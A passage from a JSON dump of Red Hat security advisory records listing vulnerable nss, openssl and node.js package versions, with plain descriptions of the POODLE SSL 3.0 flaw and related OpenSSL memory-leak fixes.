"nss-devel-3.16.2.3-2.el7_0.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "x86_64", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-2.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "x86_64", "packageName": "nss-softokn-devel", "packageFilename": "nss-softokn-devel-3.16.2.3-1.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "x86_64", "packageName": "nss-softokn-freebl-devel", "packageFilename": "nss-softokn-freebl-devel-3.16.2.3-1.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "i686", "packageName": "nss-softokn-devel", "packageFilename": "nss-softokn-devel-3.16.2.3-1.el7_0.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "x86_64", "packageName": "nss-util-devel", "packageFilename": "nss-util-devel-3.16.2.3-1.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "i686", "packageName": "nss-util-devel", "packageFilename": "nss-util-devel-3.16.2.3-1.el7_0.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "i686", "packageName": "nss-softokn-freebl-devel", "packageFilename": "nss-softokn-freebl-devel-3.16.2.3-1.el7_0.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "x86_64", "packageName": "nss-softokn", "packageFilename": "nss-softokn-3.16.2.3-1.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "x86_64", "packageName": "nss-softokn-freebl", "packageFilename": "nss-softokn-freebl-3.16.2.3-1.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "x86_64", "packageName": "nss-util", "packageFilename": "nss-util-3.16.2.3-1.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "i686", "packageName": "nss-softokn-freebl", "packageFilename": "nss-softokn-freebl-3.16.2.3-1.el7_0.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "x86_64", "packageName": "nss-sysinit", "packageFilename": "nss-sysinit-3.16.2.3-2.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "i686", "packageName": "nss-util", "packageFilename": "nss-util-3.16.2.3-1.el7_0.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "x86_64", "packageName": "nss", "packageFilename": "nss-3.16.2.3-2.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "x86_64", "packageName": "nss-tools", "packageFilename": "nss-tools-3.16.2.3-2.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "i686", "packageName": "nss-softokn", "packageFilename": "nss-softokn-3.16.2.3-1.el7_0.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "i686", "packageName": "nss", "packageFilename": "nss-3.16.2.3-2.el7_0.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "ppc", "packageName": "nss-softokn-debuginfo", "packageFilename": "nss-softokn-debuginfo-3.16.2.3-1.el7_0.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "ppc", "packageName": "nss-util-debuginfo", "packageFilename": "nss-util-debuginfo-3.16.2.3-1.el7_0.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "ppc", "packageName": "nss-debuginfo", "packageFilename": "nss-debuginfo-3.16.2.3-2.el7_0.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "ppc64", "packageName": "nss-util-debuginfo", "packageFilename": "nss-util-debuginfo-3.16.2.3-1.el7_0.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "ppc64", "packageName": "nss-softokn-debuginfo", "packageFilename": "nss-softokn-debuginfo-3.16.2.3-1.el7_0.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "ppc64", "packageName": "nss-debuginfo", "packageFilename": "nss-debuginfo-3.16.2.3-2.el7_0.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "ppc64", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-2.el7_0.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "ppc", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-2.el7_0.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "ppc", "packageName": "nss-util-devel", "packageFilename": "nss-util-devel-3.16.2.3-1.el7_0.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "ppc64", "packageName": "nss-tools", "packageFilename": "nss-tools-3.16.2.3-2.el7_0.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "ppc", "packageName": "nss-util", "packageFilename": "nss-util-3.16.2.3-1.el7_0.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "ppc64", "packageName": "nss-softokn-devel", "packageFilename": "nss-softokn-devel-3.16.2.3-1.el7_0.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "ppc64", "packageName": "nss-util", "packageFilename": "nss-util-3.16.2.3-1.el7_0.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "ppc", "packageName": "nss", "packageFilename": "nss-3.16.2.3-2.el7_0.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "ppc64", "packageName": "nss-softokn-freebl", "packageFilename": "nss-softokn-freebl-3.16.2.3-1.el7_0.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "ppc", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-2.el7_0.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "ppc", "packageName": "nss-softokn-devel", "packageFilename": "nss-softokn-devel-3.16.2.3-1.el7_0.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "ppc64", "packageName": "nss-softokn-freebl-devel", "packageFilename": "nss-softokn-freebl-devel-3.16.2.3-1.el7_0.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "ppc", "packageName": "nss-softokn-freebl-devel", "packageFilename": "nss-softokn-freebl-devel-3.16.2.3-1.el7_0.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "ppc64", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-2.el7_0.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "ppc64", "packageName": "nss-sysinit", "packageFilename": "nss-sysinit-3.16.2.3-2.el7_0.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "ppc64", "packageName": "nss-util-devel", "packageFilename": "nss-util-devel-3.16.2.3-1.el7_0.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "ppc64", "packageName": "nss-softokn", "packageFilename": "nss-softokn-3.16.2.3-1.el7_0.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "ppc", "packageName": "nss-softokn", "packageFilename": "nss-softokn-3.16.2.3-1.el7_0.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "ppc", "packageName": "nss-softokn-freebl", "packageFilename": "nss-softokn-freebl-3.16.2.3-1.el7_0.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "ppc64", "packageName": "nss", "packageFilename": "nss-3.16.2.3-2.el7_0.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "s390", "packageName": "nss-util-debuginfo", "packageFilename": "nss-util-debuginfo-3.16.2.3-1.el7_0.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "s390x", "packageName": "nss-softokn-debuginfo", "packageFilename": "nss-softokn-debuginfo-3.16.2.3-1.el7_0.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "s390x", "packageName": "nss-util-debuginfo", "packageFilename": "nss-util-debuginfo-3.16.2.3-1.el7_0.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "s390x", "packageName": "nss-debuginfo", "packageFilename": "nss-debuginfo-3.16.2.3-2.el7_0.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "s390", "packageName": "nss-debuginfo", "packageFilename": "nss-debuginfo-3.16.2.3-2.el7_0.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "s390", "packageName": "nss-softokn-debuginfo", "packageFilename": "nss-softokn-debuginfo-3.16.2.3-1.el7_0.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "s390x", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-2.el7_0.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "s390", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-2.el7_0.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "s390x", "packageName": "nss-util", "packageFilename": "nss-util-3.16.2.3-1.el7_0.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "s390", "packageName": "nss-softokn-freebl-devel", "packageFilename": "nss-softokn-freebl-devel-3.16.2.3-1.el7_0.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "s390x", "packageName": "nss-util-devel", "packageFilename": "nss-util-devel-3.16.2.3-1.el7_0.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "s390", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-2.el7_0.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "s390", "packageName": "nss-util", "packageFilename": "nss-util-3.16.2.3-1.el7_0.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "s390", "packageName": "nss", "packageFilename": "nss-3.16.2.3-2.el7_0.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "s390", "packageName": "nss-softokn-freebl", "packageFilename": "nss-softokn-freebl-3.16.2.3-1.el7_0.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "s390x", "packageName": "nss-sysinit", "packageFilename": "nss-sysinit-3.16.2.3-2.el7_0.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "s390x", "packageName": "nss-softokn-freebl", "packageFilename": "nss-softokn-freebl-3.16.2.3-1.el7_0.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "s390x", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-2.el7_0.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "s390x", "packageName": "nss-softokn-freebl-devel", "packageFilename": "nss-softokn-freebl-devel-3.16.2.3-1.el7_0.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "s390x", "packageName": "nss-tools", "packageFilename": "nss-tools-3.16.2.3-2.el7_0.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "s390x", "packageName": "nss-softokn", "packageFilename": "nss-softokn-3.16.2.3-1.el7_0.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "s390x", "packageName": "nss-softokn-devel", "packageFilename": "nss-softokn-devel-3.16.2.3-1.el7_0.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "s390", "packageName": "nss-util-devel", "packageFilename": "nss-util-devel-3.16.2.3-1.el7_0.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "s390x", "packageName": "nss", "packageFilename": "nss-3.16.2.3-2.el7_0.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "s390", "packageName": "nss-softokn-devel", "packageFilename": "nss-softokn-devel-3.16.2.3-1.el7_0.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "s390", "packageName": "nss-softokn", "packageFilename": "nss-softokn-3.16.2.3-1.el7_0.s390.rpm", "operator": "lt"}], "description": "Network Security Services (NSS) is a set of libraries designed to support\nthe cross-platform development of security-enabled client and server\napplications. Netscape Portable Runtime (NSPR) provides platform\nindependence for non-GUI operating system facilities.\n\nThis update adds support for the TLS Fallback Signaling Cipher Suite Value\n(TLS_FALLBACK_SCSV), which can be used to prevent protocol downgrade\nattacks against applications which re-connect using a lower SSL/TLS\nprotocol version when the initial connection indicating the highest\nsupported protocol version fails.\n\nThis can prevent a forceful downgrade of the communication to SSL 3.0.\nThe SSL 3.0 protocol was found to be vulnerable to the padding oracle\nattack when using block cipher suites in cipher block chaining (CBC) mode.\nThis issue is identified as CVE-2014-3566, and also known under the alias\nPOODLE. This SSL 3.0 protocol flaw will not be addressed in a future\nupdate; it is recommended that users configure their applications to\nrequire at least TLS protocol version 1.0 for secure communication.\n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1232123\n\nThe nss, nss-util, and nss-softokn packages have been upgraded to upstream\nversion 3.16.2.3, which provides a number of bug fixes and enhancements\nover the previous version, and adds the support for Mozilla Firefox 31.3.\n(BZ#1158159, BZ#1165003, BZ#1165525)\n\nUsers of nss, nss-util, and nss-softokn are advised to upgrade to these\nupdated packages, which contain a backported patch to mitigate the\nCVE-2014-3566 issue, fix these bugs, and add these enhancements. After\ninstalling this update, applications using NSS or NSPR must be restarted\nfor this update to take effect.\n", "reporter": "RedHat", "published": "2014-12-02T05:00:00", "type": "redhat", "title": "(RHSA-2014:1948) Important: nss, nss-util, and nss-softokn security, bug fix, and enhancement update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-06T20:24:07", "id": "RHSA-2014:1948", "href": "https://access.redhat.com/errata/RHSA-2014:1948", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-06-06T23:50:09", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.16.4.2-1.el6op", "arch": "noarch", "packageName": "openshift-origin-node-proxy", "packageFilename": "openshift-origin-node-proxy-1.16.4.2-1.el6op.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.16.4.2-1.el6op", "arch": "src", "packageName": "openshift-origin-node-proxy", "packageFilename": "openshift-origin-node-proxy-1.16.4.2-1.el6op.src.rpm", "operator": "lt"}], "description": "OpenShift Enterprise by Red Hat is the company's cloud computing\nPlatform-as-a-Service (PaaS) solution designed for on-premise or private\ncloud deployments.\n\nNode.js is a software development platform for building fast and scalable\nnetwork applications in the JavaScript programming language.\n\nA flaw was found in the way SSL 3.0 handled padding bytes when decrypting\nmessages encrypted using block ciphers in cipher block chaining (CBC) mode.\nThis flaw allows a man-in-the-middle (MITM) attacker to decrypt a selected\nbyte of a cipher text in as few as 256 tries if they are able to force a\nvictim application to repeatedly send the same data over newly created SSL\n3.0 connections. (CVE-2014-3566)\n\nAll OpenShift Enterprise users are advised to upgrade to these updated\npackages, which correct this issue.\n", "reporter": "RedHat", "published": "2015-08-04T04:00:00", "type": "redhat", "title": "(RHSA-2015:1546) Important: node.js security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-07T02:48:21", "id": "RHSA-2015:1546", "href": "https://access.redhat.com/errata/RHSA-2015:1546", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-11-25T14:52:35", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "enchantments_done": [], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "x86_64", "packageFilename": "openssl-1.0.1e-30.el6_6.2.x86_64.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "src", "packageFilename": "openssl-1.0.1e-30.el6_6.2.src.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "x86_64", "packageFilename": "openssl-static-1.0.1e-30.el6_6.2.x86_64.rpm", "packageName": "openssl-static", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "x86_64", "packageFilename": "openssl-debuginfo-1.0.1e-30.el6_6.2.x86_64.rpm", "packageName": "openssl-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "x86_64", "packageFilename": "openssl-perl-1.0.1e-30.el6_6.2.x86_64.rpm", "packageName": "openssl-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "x86_64", "packageFilename": "openssl-devel-1.0.1e-30.el6_6.2.x86_64.rpm", "packageName": "openssl-devel", "operator": "lt"}], "description": "OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),\nTransport Layer Security (TLS), and Datagram Transport Layer Security\n(DTLS) protocols, as well as a full-strength, general purpose cryptography\nlibrary.\n\nThis update adds support for the TLS Fallback Signaling Cipher Suite Value\n(TLS_FALLBACK_SCSV), which can be used to prevent protocol downgrade\nattacks against applications which re-connect using a lower SSL/TLS\nprotocol version when the initial connection indicating the highest\nsupported protocol version fails.\n\nThis can prevent a forceful downgrade of the communication to SSL 3.0.\nThe SSL 3.0 protocol was found to be vulnerable to the padding oracle\nattack when using block cipher suites in cipher block chaining (CBC) mode.\nThis issue is identified as CVE-2014-3566, and also known under the alias\nPOODLE. This SSL 3.0 protocol flaw will not be addressed in a future\nupdate; it is recommended that users configure their applications to\nrequire at least TLS protocol version 1.0 for secure communication.\n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1232123\n\nA memory leak flaw was found in the way OpenSSL parsed the DTLS Secure\nReal-time Transport Protocol (SRTP) extension data. A remote attacker could\nsend multiple specially crafted handshake messages to exhaust all available\nmemory of an SSL/TLS or DTLS server. (CVE-2014-3513)\n\nA memory leak flaw was found in the way an OpenSSL handled failed session\nticket integrity checks. A remote attacker could exhaust all available\nmemory of an SSL/TLS or DTLS server by sending a large number of invalid\nsession tickets to that server. (CVE-2014-3567)\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain backported patches to mitigate the CVE-2014-3566 issue and correct\nthe CVE-2014-3513 and CVE-2014-3567 issues. For the update to take effect,\nall services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\n", "reporter": "RedHat", "published": "2014-10-22T04:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "redhat", "title": "(RHSA-2014:1692) Important: openssl security update", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2015-04-24T14:20:56", "id": "RHSA-2014:1692", "href": "https://access.redhat.com/errata/RHSA-2014:1692", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-06-12T21:10:03", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "i686", "packageName": "openssl-debuginfo", "packageFilename": "openssl-debuginfo-1.0.1e-30.el6_6.2.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "src", "packageName": "openssl", "packageFilename": "openssl-1.0.1e-30.el6_6.2.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "x86_64", "packageName": "openssl-debuginfo", "packageFilename": "openssl-debuginfo-1.0.1e-30.el6_6.2.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "i686", "packageName": "openssl-perl", "packageFilename": "openssl-perl-1.0.1e-30.el6_6.2.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "i686", "packageName": "openssl-static", "packageFilename": "openssl-static-1.0.1e-30.el6_6.2.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "i686", "packageName": "openssl-devel", "packageFilename": "openssl-devel-1.0.1e-30.el6_6.2.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "x86_64", "packageName": "openssl-devel", "packageFilename": "openssl-devel-1.0.1e-30.el6_6.2.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "x86_64", "packageName": "openssl-perl", "packageFilename": "openssl-perl-1.0.1e-30.el6_6.2.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "x86_64", "packageName": "openssl-static", "packageFilename": "openssl-static-1.0.1e-30.el6_6.2.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "i686", "packageName": "openssl", "packageFilename": "openssl-1.0.1e-30.el6_6.2.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "x86_64", "packageName": "openssl", "packageFilename": "openssl-1.0.1e-30.el6_6.2.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "ppc", "packageName": "openssl-debuginfo", "packageFilename": "openssl-debuginfo-1.0.1e-30.el6_6.2.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "ppc64", "packageName": "openssl-debuginfo", "packageFilename": "openssl-debuginfo-1.0.1e-30.el6_6.2.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "ppc64", "packageName": "openssl-static", "packageFilename": "openssl-static-1.0.1e-30.el6_6.2.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "ppc64", "packageName": "openssl-perl", "packageFilename": "openssl-perl-1.0.1e-30.el6_6.2.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "ppc64", "packageName": "openssl", "packageFilename": "openssl-1.0.1e-30.el6_6.2.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "ppc", "packageName": "openssl-devel", "packageFilename": "openssl-devel-1.0.1e-30.el6_6.2.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "ppc64", "packageName": "openssl-devel", "packageFilename": "openssl-devel-1.0.1e-30.el6_6.2.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "ppc", "packageName": "openssl", "packageFilename": "openssl-1.0.1e-30.el6_6.2.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "s390", "packageName": "openssl-debuginfo", "packageFilename": "openssl-debuginfo-1.0.1e-30.el6_6.2.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "s390x", "packageName": "openssl-debuginfo", "packageFilename": "openssl-debuginfo-1.0.1e-30.el6_6.2.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "s390x", "packageName": "openssl-static", "packageFilename": "openssl-static-1.0.1e-30.el6_6.2.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "s390x", "packageName": "openssl", "packageFilename": "openssl-1.0.1e-30.el6_6.2.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "s390", "packageName": "openssl-devel", "packageFilename": "openssl-devel-1.0.1e-30.el6_6.2.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "s390", "packageName": "openssl", "packageFilename": "openssl-1.0.1e-30.el6_6.2.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "s390x", "packageName": "openssl-devel", 